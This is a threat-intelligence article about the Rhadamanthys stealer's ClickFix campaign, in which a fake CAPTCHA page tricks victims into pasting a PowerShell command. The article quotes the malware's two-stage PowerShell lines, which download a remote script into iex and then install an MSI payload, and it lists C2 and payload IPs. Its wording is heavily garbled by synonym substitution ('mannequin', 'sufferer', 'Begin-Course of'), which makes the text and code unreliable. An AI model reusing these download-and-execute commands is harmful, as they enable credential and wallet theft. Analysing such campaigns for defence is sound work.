Rhadamanthys first surfaced in 2022 as a modular stealer bought below the Malware-as-a-Service mannequin, however its newest marketing campaign reveals how shortly it’s innovating.
On the centre of the brand new wave is a booby-trapped CAPTCHA web page dubbed ClickFix, which instructs victims to “confirm” their session by pasting a PowerShell command.
As soon as executed, the command silently reaches out to hxxps://ypp-studio[.]com/replace.txt, turns off execution-policy safeguards and fetches the next-stage payload in reminiscence—fully fileless till the ultimate drop.
Darkish Atlas analysts famous that the lure pages are hosted on freshly registered typosquats, typically imitating YouTube Companion Studio or comparable SaaS portals, and that the underlying infrastructure has migrated from the sooner 77.239.96.51/rh_0.9.0.exe host to 62.60.226.74/PTRFHDGS.msi.
This delicate shift breaks hard-coded IoCs utilized by many safety instruments whereas preserving the stealer’s supply chain.
Marketing campaign telemetry reveals a major uptick in infections throughout small-to-medium enterprises throughout June and early July 2025, with stolen browser cookies and cloud credentials showing on dark-web markets inside hours of compromise.
What makes ClickFix particularly potent is its social-engineering layer. The CAPTCHA display gives a pretend sense of legitimacy whereas exactly guiding the sufferer to press Win + R, paste the command, and hit Enter.
That single motion bypasses conventional e-mail gateway filters and avoids the macros most blue groups hunt for.
Verification full (Supply – Darkish Atlas)
By the point a person sees the reassuring “Verification full!” pop-up, Rhadamanthys has already unpacked within the background and begun siphoning knowledge to its C2 at 193.109.85.136.
An infection Mechanism
The preliminary PowerShell command is closely padded with hash symbols to evade string-based detectors, but resolves into solely two purposeful traces:-
# Stage 1 – clipboard payload
$u=’hxxps://ypp-studio[.]com/replace.txt’; (New-Object Web.WebClient).DownloadString($u) | iex
# Stage 2 – decoded from Stage 1
Invoke-WebRequest -Uri -OutFile $env:AppData+’PTRFHDGS.msi’;
Begin-Course of msiexec.exe -ArgumentList ‘/i’, $env:AppData+’PTRFHDGS.msi’;
Stage 1 lives solely in reminiscence; Stage 2 writes the MSI installer as PTRFHDGS.msi, which drops rh_0.9.0.exe and launches it with msiexec in order that guardian/youngster correlations seem benign.
The executable instantly enumerates working processes, trying to find debuggers resembling x64dbg.exe, ida64.exe, or ProcessHacker.exe; if discovered, it terminates itself to frustrate evaluation.
It follows with time-based anti-sandbox checks utilizing QueryPerformanceCounter, then injects into WerFault.exe—a trusted Home windows Error Reporting binary—to persist and exfiltrate.
A single TCP stream to the hard-coded IP carries compressed archives containing browser databases, crypto-wallet information and KeePass vaults.
Capturing screenshot (Supply – Darkish Atlas)
Screenshots captured by way of BitBlt are appended, giving operators a real-time window into sufferer exercise.
Since Rhadamanthys resolves its C2 by literal IP, DNS-layer defences see nothing, and encrypted TLS over port 443 blends seamlessly with regular site visitors.
The ClickFix marketing campaign underscores how effortlessly adversaries can fuse social engineering with low-friction LOLBins to bypass layered defences.
Updating signature-based guidelines to incorporate execution-policy bypasses, monitoring youngster processes of msiexec.exe, and alerting on clipboard-sourced PowerShell are speedy steps defenders ought to take into account.
But the broader lesson is behavioural: any “verification” immediate that asks customers to run code is suspect—particularly when the one factor it fixes is the attacker’s foothold.
Examine stay malware conduct, hint each step of an assault, and make quicker, smarter safety selections -> Attempt ANY.RUN now
